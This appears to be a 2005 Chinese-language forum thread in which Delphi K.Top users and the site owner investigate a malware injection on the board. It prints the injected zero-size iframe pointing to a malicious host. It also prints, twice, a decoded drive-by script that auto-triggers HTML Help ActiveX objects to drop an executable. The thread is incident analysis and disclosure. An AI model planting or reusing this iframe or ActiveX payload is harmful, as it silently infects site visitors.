本站被入侵了嗎？    檢查每個網頁程式碼最後一段table上方出現以下網址：    http://fucktw.go.3322.org    每個網頁跳出說明視窗： 由http://www.650411.net/default.htm 引起的        網海無涯，唯學是岸！ 發表人 - qoo1234 於 2005/11/23 18:32:11 發表人 - qoo1234 於 2005/11/23 18:33:54

查看页面 Source ，的确发现一个大小为 0 的 IFrame:    <iframe src="http://fucktw.go.3322.org" width=0 height=0></iframe> 连接的这个 fucktw.go.3322.org ，是一个动态 IP 解析的 Domain name. 3322.org 是提供动态 IP 解析服务的。 fucktw.go.3322.org 这个 domain name 似乎没有被解析，可能是它的主人没有开自己的电脑。因为最近几天我 ping 它，得到的 IP 都和 www.3322.org 本身一致。 它把自己隐藏在一个大小为 0 的 IFrame 里，似乎是想让大家访问它却不被发现。不排除它在自己的页面内暗藏病毒或木马的可能。

上KTop後 我就中毒了(會跑出說明視窗) 與 產生莫名奇妙的執行檔c:\arcldrer.exe => 還向外連線 殺也殺不掉 檔案總管也當掉了....慘阿 電腦不穩中..... Norton 防毒 真沒用 ..>< ********************************************************* 有系統的知識才是力量

小弟追蹤了一下， http://www.650411.net/default.htm 會回傳一個 script, decode 後如下：    

<HTML>
<BODY>



<OBJECT id="window98" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="windXP" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="cnbore2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>


var tk=navigator.userAgent;
if(tk.indexOf('MSIE 6.0')>=1){
windXP.Click();
}else{
window98.Click();
}
setTimeout("cnbore2.Click();",0);

</BODY></HTML>

bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe，從其 version info 得知原名為 HideDownFile.exe，Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了，不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st

引言: 小弟追蹤了一下， http://www.650411.net/default.htm 會回傳一個 script, decode 後如下：

<HTML>
<BODY>



<OBJECT id="window98" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="windXP" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>
<OBJECT id="cnbore2" type="application/x-oleobject" classid="clsid:adb880a6-d8ff-11cf-9377-00aa003b7a11"></OBJECT>


var tk=navigator.userAgent;
if(tk.indexOf('MSIE 6.0')>=1){
windXP.Click();
}else{
window98.Click();
}
setTimeout("cnbore2.Click();",0);

</BODY></HTML>

bbs003302.gif 是另一個 script 而 bbs003302.css 則是一個 exe，從其 version info 得知原名為 HideDownFile.exe，Icon 則為 MFC 預設 icon。我想暫時還是用 Firefox 好了，不竟 ActiveX 還是比較危險 希望 face='Lucida Console'>http://pywong.hk.st

william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!

引言: william版主有追蹤到, 不知道是否有解決之道, 因為已經好幾天了, 最近我實在不太敢上來, 怕萬一那天我的系統擋不住! 謝謝!

解決之道？我想應該先將該木馬從 KTop 清除吧，這個可能要勞煩天使大大了...小弟暫時還是用不支援 ActiveX 的 browser (Firefox) 上 KTop。話說回來，小弟一直用 IE 來瀏覽 KTop，好像沒甚麼異樣 小弟的配置： > < face='Lucida Console'>http://pywong.hk.st

天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon

引言: 天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon

攻擊好像只針對XP和98和IE6.0以上,使用2k不會有問題 一開始是拼命要執行NTLOADER.HTA這支惡意程式 目前則是產生arcldrer.exe這支後門程式來執行 收割期了吧~~

可是到現在站長怎麼還沒把病毒清掉阿~!! 搞不懂~

------
人生就像泡泡一樣，乘著風被吹著跑，等你發現時已經消失了。
就在快要消失的瞬間，希望能再飛高一點，
但是回神時總是慢了一步。

小弟防毒裝卡巴斯基,每開一次網頁卡巴斯基都會出現 有潛在的危險程式Exploit.VBS.Phel.cb. @@"

很抱歉,因為站長出國一個星期,回國後才獲知這個消息! 對於造成各位網友的困擾,在此鄭重道歉! 這個病毒暫時清除! 他的手法是搜尋.HTM/.HTML/.ASP/.PHP等Script程式檔案 找到 < / body > 語法處 , 在前面加上 < i frame src="http://fucktw.go.3322.org" width=0 height=0> < / iframe> 讓本站網頁導入fucktw.go.3322.org這個病毒網頁中 目前本站採取了一些防範措施,希望能奏效, 猜測是利用IIS的漏洞進來的! 本站對此人的行為表示嚴厲的譴責, 並且已經保留相關證據, 保留日後的法律追究權利! 再次感謝各位熱心的協助! 站長敬上 ～～～Delphi K.Top討論區站長～～～

------
～～～Delphi K.Top討論區站長～～～

引言:

引言: 天..我根本不知道有這回事...不過我卻沒出現問題,已經整個星期都沒關了... Internet Browser: Maxthon

攻擊好像只針對XP和98和IE6.0以上,使用2k不會有問題 一開始是拼命要執行NTLOADER.HTA這支惡意程式 目前則是產生arcldrer.exe這支後門程式來執行 收割期了吧~~

我是XP,Maxthon是IE核心,我發現是我的Norton的Internet Worm Protection幫我擋掉了(感激不盡啊)